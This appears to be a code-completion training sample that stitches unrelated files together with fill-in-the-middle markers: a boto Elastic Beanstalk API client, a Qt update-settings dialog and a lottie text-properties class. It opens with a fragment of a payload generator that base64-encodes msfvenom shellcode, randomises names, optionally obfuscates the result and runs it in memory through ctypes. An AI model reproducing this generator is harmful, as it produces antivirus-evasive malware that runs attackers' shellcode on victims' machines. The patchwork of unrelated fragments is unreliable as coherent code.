PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode<|fim▁end|>
|
from modules.common import helpers
from modules.common import encryption
|
<|file_name|>update_settings_dialog.cc<|end_file_name|><|fim▁begin|>//
// Aspia Project
// Copyright (C) 2018 Dmitry Chapyshev <dmitry@aspia.ru>
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <https://www.gnu.org/licenses/>.
//
#include "console/update_settings_dialog.h"
#include "build/build_config.h"
#include "console/console_settings.h"
namespace console {
<|fim▁hole|> : QDialog(parent)
{
ui.setupUi(this);
Settings settings;
ui.checkbox_check_updates->setChecked(settings.checkUpdates());
ui.edit_server->setText(settings.updateServer());
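    // A stored server other than the default means the user configured a
    // custom one; mirror that in the checkbox and edit field below.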
if (settings.updateServer() == DEFAULT_UPDATE_SERVER)
{
ui.checkbox_custom_server->setChecked(false);
ui.edit_server->setEnabled(false);
}
else
{
ui.checkbox_custom_server->setChecked(true);
ui.edit_server->setEnabled(true);
}
connect(ui.checkbox_custom_server, &QCheckBox::toggled, [this](bool checked)
{
ui.edit_server->setEnabled(checked);
if (!checked)
ui.edit_server->setText(DEFAULT_UPDATE_SERVER);
});
connect(ui.button_box, &QDialogButtonBox::clicked, [this](QAbstractButton* button)
{
if (ui.button_box->standardButton(button) == QDialogButtonBox::Ok)
{
Settings settings;
settings.setCheckUpdates(ui.checkbox_check_updates->isChecked());
settings.setUpdateServer(ui.edit_server->text());
}
close();
});
}
UpdateSettingsDialog::~UpdateSettingsDialog() = default;
} // namespace console<|fim▁end|>
|
UpdateSettingsDialog::UpdateSettingsDialog(QWidget* parent)
|
<|file_name|>LetterProps.js<|end_file_name|><|fim▁begin|>function LetterProps(o, sw, sc, fc, m, p) {
this.o = o;
this.sw = sw;
this.sc = sc;
this.fc = fc;
this.m = m;
this.p = p;
this._mdf = {
o: true,
sw: !!sw,
sc: !!sc,
fc: !!fc,
m: true,
p: true,
};
}
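// Compares the incoming values with the cached ones, records which fields
// changed in the _mdf ("modified") flags, and returns true when anything
// changed. The abbreviations appear to follow lottie's convention (an
// assumption): o = opacity, sw = stroke width, sc = stroke color,
// fc = fill color, m = matrix string, p = transform properties.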
LetterProps.prototype.update = function (o, sw, sc, fc, m, p) {
this._mdf.o = false;
this._mdf.sw = false;
this._mdf.sc = false;
this._mdf.fc = false;
this._mdf.m = false;
this._mdf.p = false;
var updated = false;
if (this.o !== o) {
this.o = o;
this._mdf.o = true;
updated = true;
}
if (this.sw !== sw) {
this.sw = sw;
this._mdf.sw = true;
updated = true;
}
if (this.sc !== sc) {
this.sc = sc;
this._mdf.sc = true;
updated = true;
}
if (this.fc !== fc) {
this.fc = fc;
this._mdf.fc = true;
updated = true;
}
if (this.m !== m) {
this.m = m;
this._mdf.m = true;
updated = true;
}
if (p.length && (this.p[0] !== p[0] || this.p[1] !== p[1] || this.p[4] !== p[4] || this.p[5] !== p[5] || this.p[12] !== p[12] || this.p[13] !== p[13])) {
this.p = p;
this._mdf.p = true;
updated = true;
}
<|fim▁hole|><|fim▁end|>
|
return updated;
};
|
<|file_name|>layer1.py<|end_file_name|><|fim▁begin|># Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import boto
import boto.jsonresponse
from boto.compat import json
from boto.regioninfo import RegionInfo
from boto.connection import AWSQueryConnection
class Layer1(AWSQueryConnection):
APIVersion = '2010-12-01'
DefaultRegionName = 'us-east-1'
DefaultRegionEndpoint = 'elasticbeanstalk.us-east-1.amazonaws.com'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None,
proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None, debug=0,
https_connection_factory=None, region=None, path='/',
api_version=None, security_token=None, profile_name=None):
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
self.region = region
super(Layer1, self).__init__(aws_access_key_id,
aws_secret_access_key,
is_secure, port, proxy, proxy_port,
proxy_user, proxy_pass,
self.region.endpoint, debug,
https_connection_factory, path,
security_token, profile_name=profile_name)
def _required_auth_capability(self):
return ['hmac-v4']
def _encode_bool(self, v):
v = bool(v)
return {True: "true", False: "false"}[v]
def _get_response(self, action, params, path='/', verb='GET'):
params['ContentType'] = 'JSON'
response = self.make_request(action, params, path, verb)
body = response.read()
boto.log.debug(body)
if response.status == 200:
return json.loads(body)
else:
raise self.ResponseError(response.status, response.reason, body)
def check_dns_availability(self, cname_prefix):
"""Checks if the specified CNAME is available.
:type cname_prefix: string
:param cname_prefix: The prefix used when this CNAME is
reserved.
"""
params = {'CNAMEPrefix': cname_prefix}
return self._get_response('CheckDNSAvailability', params)
def create_application(self, application_name, description=None):
"""
Creates an application that has one configuration template
named default and no application versions.
:type application_name: string
:param application_name: The name of the application.
Constraint: This name must be unique within your account. If the
specified name already exists, the action returns an
InvalidParameterValue error.
:type description: string
:param description: Describes the application.
:raises: TooManyApplicationsException
"""
params = {'ApplicationName': application_name}
if description:
params['Description'] = description
return self._get_response('CreateApplication', params)
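    # Usage sketch (hypothetical names; assumes AWS credentials are already
    # configured for boto):
    #
    #   conn = Layer1()
    #   conn.create_application('myapp', description='demo application')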
def create_application_version(self, application_name, version_label,
description=None, s3_bucket=None,
s3_key=None, auto_create_application=None):
"""Creates an application version for the specified application.
:type application_name: string
:param application_name: The name of the application. If no
application is found with this name, and AutoCreateApplication is
false, returns an InvalidParameterValue error.
:type version_label: string
:param version_label: A label identifying this version. Constraint:
Must be unique per application. If an application version already
exists with this label for the specified application, AWS Elastic
Beanstalk returns an InvalidParameterValue error.
:type description: string
:param description: Describes this version.
:type s3_bucket: string
:param s3_bucket: The Amazon S3 bucket where the data is located.
:type s3_key: string
:param s3_key: The Amazon S3 key where the data is located. Both
s3_bucket and s3_key must be specified in order to use a specific
source bundle. If both of these values are not specified the
sample application will be used.
:type auto_create_application: boolean
:param auto_create_application: Determines how the system behaves if
the specified application for this version does not already exist:
true: Automatically creates the specified application for this
version if it does not already exist. false: Returns an
InvalidParameterValue if the specified application for this version
does not already exist. Default: false Valid Values: true | false
:raises: TooManyApplicationsException,
TooManyApplicationVersionsException,
InsufficientPrivilegesException,
S3LocationNotInServiceRegionException
"""
params = {'ApplicationName': application_name,
'VersionLabel': version_label}
if description:
params['Description'] = description
if s3_bucket and s3_key:
params['SourceBundle.S3Bucket'] = s3_bucket
params['SourceBundle.S3Key'] = s3_key
if auto_create_application:
params['AutoCreateApplication'] = self._encode_bool(
auto_create_application)
return self._get_response('CreateApplicationVersion', params)
def create_configuration_template(self, application_name, template_name,
solution_stack_name=None,
source_configuration_application_name=None,
source_configuration_template_name=None,
environment_id=None, description=None,
option_settings=None):
"""Creates a configuration template.
Templates are associated with a specific application and are used to
deploy different versions of the application with the same
configuration settings.
:type application_name: string
:param application_name: The name of the application to associate with
this configuration template. If no application is found with this
name, AWS Elastic Beanstalk returns an InvalidParameterValue error.
:type template_name: string
:param template_name: The name of the configuration template.
Constraint: This name must be unique per application. Default: If
a configuration template already exists with this name, AWS Elastic
Beanstalk returns an InvalidParameterValue error.
:type solution_stack_name: string
:param solution_stack_name: The name of the solution stack used by this
configuration. The solution stack specifies the operating system,
architecture, and application server for a configuration template.
It determines the set of configuration options as well as the
possible and default values. Use ListAvailableSolutionStacks to
obtain a list of available solution stacks. Default: If the
SolutionStackName is not specified and the source configuration
parameter is blank, AWS Elastic Beanstalk uses the default solution
stack. If not specified and the source configuration parameter is
specified, AWS Elastic Beanstalk uses the same solution stack as
the source configuration template.
:type source_configuration_application_name: string
:param source_configuration_application_name: The name of the
application associated with the configuration.
:type source_configuration_template_name: string
:param source_configuration_template_name: The name of the
configuration template.
:type environment_id: string
:param environment_id: The ID of the environment used with this
configuration template.
:type description: string
:param description: Describes this configuration.
:type option_settings: list
:param option_settings: If specified, AWS Elastic Beanstalk sets the
specified configuration option to the requested value. The new
value overrides the value obtained from the solution stack or the
source configuration template.
:raises: InsufficientPrivilegesException,
TooManyConfigurationTemplatesException
"""
params = {'ApplicationName': application_name,
'TemplateName': template_name}
if solution_stack_name:
params['SolutionStackName'] = solution_stack_name
if source_configuration_application_name:
params['SourceConfiguration.ApplicationName'] = source_configuration_application_name
if source_configuration_template_name:
params['SourceConfiguration.TemplateName'] = source_configuration_template_name
if environment_id:
params['EnvironmentId'] = environment_id
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
return self._get_response('CreateConfigurationTemplate', params)
def create_environment(self, application_name, environment_name,
version_label=None, template_name=None,
solution_stack_name=None, cname_prefix=None,
description=None, option_settings=None,
options_to_remove=None, tier_name=None,
tier_type=None, tier_version='1.0'):
"""Launches an environment for the application using a configuration.
:type application_name: string
:param application_name: The name of the application that contains the
version to be deployed. If no application is found with this name,
CreateEnvironment returns an InvalidParameterValue error.
:type environment_name: string
:param environment_name: A unique name for the deployment environment.
Used in the application URL. Constraint: Must be from 4 to 23
characters in length. The name can contain only letters, numbers,
and hyphens. It cannot start or end with a hyphen. This name must
be unique in your account. If the specified name already exists,
AWS Elastic Beanstalk returns an InvalidParameterValue error.
Default: If the CNAME parameter is not specified, the environment
name becomes part of the CNAME, and therefore part of the visible
URL for your application.
:type version_label: string
:param version_label: The name of the application version to deploy. If
the specified application has no associated application versions,
AWS Elastic Beanstalk UpdateEnvironment returns an
InvalidParameterValue error. Default: If not specified, AWS
Elastic Beanstalk attempts to launch the most recently created
application version.
:type template_name: string
:param template_name: The name of the configuration template to
use in deployment. If no configuration template is found with this
name, AWS Elastic Beanstalk returns an InvalidParameterValue error.
Condition: You must specify either this parameter or a
SolutionStackName, but not both. If you specify both, AWS Elastic
Beanstalk returns an InvalidParameterCombination error. If you do
not specify either, AWS Elastic Beanstalk returns a
MissingRequiredParameter error.
:type solution_stack_name: string
:param solution_stack_name: This is an alternative to specifying a
configuration name. If specified, AWS Elastic Beanstalk sets the
configuration values to the default values associated with the
specified solution stack. Condition: You must specify either this
or a TemplateName, but not both. If you specify both, AWS Elastic
Beanstalk returns an InvalidParameterCombination error. If you do
not specify either, AWS Elastic Beanstalk returns a
MissingRequiredParameter error.
:type cname_prefix: string
:param cname_prefix: If specified, the environment attempts to use this
value as the prefix for the CNAME. If not specified, the
environment uses the environment name.
:type description: string
:param description: Describes this environment.
:type option_settings: list
:param option_settings: If specified, AWS Elastic Beanstalk sets the
specified configuration options to the requested value in the
configuration set for the new environment. These override the
values obtained from the solution stack or the configuration
template. Each element in the list is a tuple of (Namespace,
OptionName, Value), for example::
[('aws:autoscaling:launchconfiguration',
'Ec2KeyName', 'mykeypair')]
:type options_to_remove: list
:param options_to_remove: A list of custom user-defined configuration
options to remove from the configuration set for this new
environment.
:type tier_name: string
:param tier_name: The name of the tier. Valid values are
"WebServer" and "Worker". Defaults to "WebServer".
The ``tier_name`` and a ``tier_type`` parameters are
related and the values provided must be valid.
The possible combinations are:
* "WebServer" and "Standard" (the default)
* "Worker" and "SQS/HTTP"
:type tier_type: string
:param tier_type: The type of the tier. Valid values are
"Standard" if ``tier_name`` is "WebServer" and "SQS/HTTP"
if ``tier_name`` is "Worker". Defaults to "Standard".
:type tier_version: string
        :param tier_version: The version of the tier. Valid values
currently are "1.0". Defaults to "1.0".
:raises: TooManyEnvironmentsException, InsufficientPrivilegesException
"""
params = {'ApplicationName': application_name,
'EnvironmentName': environment_name}
if version_label:
params['VersionLabel'] = version_label
if template_name:
params['TemplateName'] = template_name
if solution_stack_name:
params['SolutionStackName'] = solution_stack_name
if cname_prefix:
params['CNAMEPrefix'] = cname_prefix
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if options_to_remove:
self.build_list_params(params, options_to_remove,
'OptionsToRemove.member')
if tier_name and tier_type and tier_version:
params['Tier.Name'] = tier_name
params['Tier.Type'] = tier_type
params['Tier.Version'] = tier_version
return self._get_response('CreateEnvironment', params)
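    # Usage sketch (hypothetical names; assumes valid AWS credentials and
    # an existing application/version). Mirrors the option_settings tuple
    # format shown in the docstring above:
    #
    #   conn = Layer1()
    #   conn.create_environment(
    #       'myapp', 'myapp-workers',
    #       version_label='v1',
    #       solution_stack_name='64bit Amazon Linux running Python',
    #       option_settings=[('aws:autoscaling:launchconfiguration',
    #                         'Ec2KeyName', 'mykeypair')],
    #       tier_name='Worker', tier_type='SQS/HTTP', tier_version='1.0')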
def create_storage_location(self):
"""
Creates the Amazon S3 storage location for the account. This
location is used to store user log files.
:raises: TooManyBucketsException,
S3SubscriptionRequiredException,
InsufficientPrivilegesException
"""
return self._get_response('CreateStorageLocation', params={})
def delete_application(self, application_name,
terminate_env_by_force=None):
"""
Deletes the specified application along with all associated
versions and configurations. The application versions will not
be deleted from your Amazon S3 bucket.
:type application_name: string
:param application_name: The name of the application to delete.
:type terminate_env_by_force: boolean
:param terminate_env_by_force: When set to true, running
environments will be terminated before deleting the application.
:raises: OperationInProgressException
"""
params = {'ApplicationName': application_name}
if terminate_env_by_force:
params['TerminateEnvByForce'] = self._encode_bool(
terminate_env_by_force)
return self._get_response('DeleteApplication', params)
def delete_application_version(self, application_name, version_label,
delete_source_bundle=None):
"""Deletes the specified version from the specified application.
:type application_name: string
:param application_name: The name of the application to delete
releases from.
:type version_label: string
:param version_label: The label of the version to delete.
:type delete_source_bundle: boolean
:param delete_source_bundle: Indicates whether to delete the
associated source bundle from Amazon S3. Valid Values: true |
false
:raises: SourceBundleDeletionException,
InsufficientPrivilegesException,
OperationInProgressException,
S3LocationNotInServiceRegionException
"""
params = {'ApplicationName': application_name,
'VersionLabel': version_label}
if delete_source_bundle:
params['DeleteSourceBundle'] = self._encode_bool(
delete_source_bundle)
return self._get_response('DeleteApplicationVersion', params)
def delete_configuration_template(self, application_name, template_name):
"""Deletes the specified configuration template.
:type application_name: string
:param application_name: The name of the application to delete
the configuration template from.
:type template_name: string
:param template_name: The name of the configuration template to
delete.
:raises: OperationInProgressException
"""
params = {'ApplicationName': application_name,
'TemplateName': template_name}
return self._get_response('DeleteConfigurationTemplate', params)
def delete_environment_configuration(self, application_name,
environment_name):
"""
Deletes the draft configuration associated with the running
environment. Updating a running environment with any
configuration changes creates a draft configuration set. You can
get the draft configuration using DescribeConfigurationSettings
while the update is in progress or if the update fails. The
DeploymentStatus for the draft configuration indicates whether
the deployment is in process or has failed. The draft
configuration remains in existence until it is deleted with this
action.
:type application_name: string
:param application_name: The name of the application the
environment is associated with.
:type environment_name: string
:param environment_name: The name of the environment to delete
the draft configuration from.
"""
params = {'ApplicationName': application_name,
'EnvironmentName': environment_name}
return self._get_response('DeleteEnvironmentConfiguration', params)
def describe_application_versions(self, application_name=None,
version_labels=None):
"""Returns descriptions for existing application versions.
:type application_name: string
:param application_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to only include ones that are associated
with the specified application.
:type version_labels: list
:param version_labels: If specified, restricts the returned
descriptions to only include ones that have the specified version
labels.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if version_labels:
self.build_list_params(params, version_labels,
'VersionLabels.member')
return self._get_response('DescribeApplicationVersions', params)
def describe_applications(self, application_names=None):
"""Returns the descriptions of existing applications.
:type application_names: list
:param application_names: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to only include those with the specified
names.
"""
params = {}
if application_names:
self.build_list_params(params, application_names,
'ApplicationNames.member')
return self._get_response('DescribeApplications', params)
def describe_configuration_options(self, application_name=None,
template_name=None,
environment_name=None,
solution_stack_name=None, options=None):
"""Describes configuration options used in a template or environment.
Describes the configuration options that are used in a
particular configuration template or environment, or that a
specified solution stack defines. The description includes the
        values of the options, their default values, and an indication of
the required action on a running environment if an option value
is changed.
:type application_name: string
:param application_name: The name of the application associated with
the configuration template or environment. Only needed if you want
to describe the configuration options associated with either the
configuration template or environment.
:type template_name: string
:param template_name: The name of the configuration template whose
configuration options you want to describe.
:type environment_name: string
:param environment_name: The name of the environment whose
configuration options you want to describe.
:type solution_stack_name: string
:param solution_stack_name: The name of the solution stack whose
configuration options you want to describe.
:type options: list
:param options: If specified, restricts the descriptions to only
the specified options.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if template_name:
params['TemplateName'] = template_name
if environment_name:
params['EnvironmentName'] = environment_name
if solution_stack_name:
params['SolutionStackName'] = solution_stack_name
if options:
self.build_list_params(params, options, 'Options.member')
return self._get_response('DescribeConfigurationOptions', params)
def describe_configuration_settings(self, application_name,
template_name=None,
environment_name=None):
"""
Returns a description of the settings for the specified
configuration set, that is, either a configuration template or
the configuration set associated with a running environment.
When describing the settings for the configuration set
associated with a running environment, it is possible to receive
two sets of setting descriptions. One is the deployed
configuration set, and the other is a draft configuration of an
environment that is either in the process of deployment or that
failed to deploy.
:type application_name: string
:param application_name: The application for the environment or
configuration template.
:type template_name: string
:param template_name: The name of the configuration template to
describe. Conditional: You must specify either this parameter or
an EnvironmentName, but not both. If you specify both, AWS Elastic
Beanstalk returns an InvalidParameterCombination error. If you do
not specify either, AWS Elastic Beanstalk returns a
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to describe.
Condition: You must specify either this or a TemplateName, but not
both. If you specify both, AWS Elastic Beanstalk returns an
InvalidParameterCombination error. If you do not specify either,
AWS Elastic Beanstalk returns MissingRequiredParameter error.
"""
params = {'ApplicationName': application_name}
if template_name:
params['TemplateName'] = template_name
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('DescribeConfigurationSettings', params)
def describe_environment_resources(self, environment_id=None,
environment_name=None):
"""Returns AWS resources for this environment.
:type environment_id: string
:param environment_id: The ID of the environment to retrieve AWS
resource usage data. Condition: You must specify either this or an
EnvironmentName, or both. If you do not specify either, AWS Elastic
Beanstalk returns MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to retrieve
AWS resource usage data. Condition: You must specify either this
or an EnvironmentId, or both. If you do not specify either, AWS
Elastic Beanstalk returns MissingRequiredParameter error.
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('DescribeEnvironmentResources', params)
def describe_environments(self, application_name=None, version_label=None,
environment_ids=None, environment_names=None,
include_deleted=None,
included_deleted_back_to=None):
"""Returns descriptions for existing environments.
:type application_name: string
:param application_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those that are associated
with this application.
:type version_label: string
:param version_label: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to include only those that are associated
with this application version.
:type environment_ids: list
:param environment_ids: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those that have the
specified IDs.
:type environment_names: list
:param environment_names: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those that have the
specified names.
:type include_deleted: boolean
:param include_deleted: Indicates whether to include deleted
environments: true: Environments that have been deleted after
IncludedDeletedBackTo are displayed. false: Do not include deleted
environments.
:type included_deleted_back_to: timestamp
:param included_deleted_back_to: If specified when IncludeDeleted is
set to true, then environments deleted after this date are
displayed.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if version_label:
params['VersionLabel'] = version_label
if environment_ids:
self.build_list_params(params, environment_ids,
'EnvironmentIds.member')
if environment_names:
self.build_list_params(params, environment_names,
'EnvironmentNames.member')
if include_deleted:
params['IncludeDeleted'] = self._encode_bool(include_deleted)
if included_deleted_back_to:
params['IncludedDeletedBackTo'] = included_deleted_back_to
return self._get_response('DescribeEnvironments', params)
def describe_events(self, application_name=None, version_label=None,
template_name=None, environment_id=None,
environment_name=None, request_id=None, severity=None,
start_time=None, end_time=None, max_records=None,
next_token=None):
"""Returns event descriptions matching criteria up to the last 6 weeks.
:type application_name: string
:param application_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those associated with
this application.
:type version_label: string
:param version_label: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those associated with this application
version.
:type template_name: string
:param template_name: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those that are associated with this
environment configuration.
:type environment_id: string
:param environment_id: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to those associated with this
environment.
:type environment_name: string
:param environment_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to those associated with this
environment.
:type request_id: string
:param request_id: If specified, AWS Elastic Beanstalk restricts the
described events to include only those associated with this request
ID.
:type severity: string
:param severity: If specified, limits the events returned from this
call to include only those with the specified severity or higher.
:type start_time: timestamp
:param start_time: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those that occur on or after this time.
:type end_time: timestamp
:param end_time: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those that occur up to, but not including,
the EndTime.
:type max_records: integer
:param max_records: Specifies the maximum number of events that can be
returned, beginning with the most recent event.
:type next_token: string
:param next_token: Pagination token. If specified, the events return
the next batch of results.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if version_label:
params['VersionLabel'] = version_label
if template_name:
params['TemplateName'] = template_name
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
if request_id:
params['RequestId'] = request_id
if severity:
params['Severity'] = severity
if start_time:
params['StartTime'] = start_time
if end_time:
params['EndTime'] = end_time
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self._get_response('DescribeEvents', params)
def list_available_solution_stacks(self):
"""Returns a list of the available solution stack names."""
return self._get_response('ListAvailableSolutionStacks', params={})
def rebuild_environment(self, environment_id=None, environment_name=None):
"""
Deletes and recreates all of the AWS resources (for example:
the Auto Scaling group, load balancer, etc.) for a specified
environment and forces a restart.
:type environment_id: string
:param environment_id: The ID of the environment to rebuild.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to rebuild.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RebuildEnvironment', params)
def request_environment_info(self, info_type='tail', environment_id=None,
environment_name=None):
"""
Initiates a request to compile the specified type of
information of the deployed environment. Setting the InfoType
to tail compiles the last lines from the application server log
files of every Amazon EC2 instance in your environment. Use
RetrieveEnvironmentInfo to access the compiled information.
:type info_type: string
:param info_type: The type of information to request.
:type environment_id: string
:param environment_id: The ID of the environment of the
requested data. If no such environment is found,
RequestEnvironmentInfo returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment of the
requested data. If no such environment is found,
RequestEnvironmentInfo returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
"""
params = {'InfoType': info_type}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RequestEnvironmentInfo', params)
def restart_app_server(self, environment_id=None, environment_name=None):
"""
Causes the environment to restart the application container
server running on each Amazon EC2 instance.
:type environment_id: string
:param environment_id: The ID of the environment to restart the server
for. Condition: You must specify either this or an
EnvironmentName, or both. If you do not specify either, AWS Elastic
Beanstalk returns MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to restart the
server for. Condition: You must specify either this or an
EnvironmentId, or both. If you do not specify either, AWS Elastic
Beanstalk returns MissingRequiredParameter error.
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RestartAppServer', params)
def retrieve_environment_info(self, info_type='tail', environment_id=None,
environment_name=None):
"""
Retrieves the compiled information from a RequestEnvironmentInfo
request.
:type info_type: string
:param info_type: The type of information to retrieve.
:type environment_id: string
:param environment_id: The ID of the data's environment. If no such
environment is found, returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the data's environment. If no such
environment is found, returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
"""
params = {'InfoType': info_type}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RetrieveEnvironmentInfo', params)
def swap_environment_cnames(self, source_environment_id=None,
source_environment_name=None,
destination_environment_id=None,
destination_environment_name=None):
"""Swaps the CNAMEs of two environments.
:type source_environment_id: string
:param source_environment_id: The ID of the source environment.
Condition: You must specify at least the SourceEnvironmentID or the
SourceEnvironmentName. You may also specify both. If you specify
the SourceEnvironmentId, you must specify the
DestinationEnvironmentId.
:type source_environment_name: string
:param source_environment_name: The name of the source environment.
Condition: You must specify at least the SourceEnvironmentID or the
SourceEnvironmentName. You may also specify both. If you specify
the SourceEnvironmentName, you must specify the
DestinationEnvironmentName.
:type destination_environment_id: string
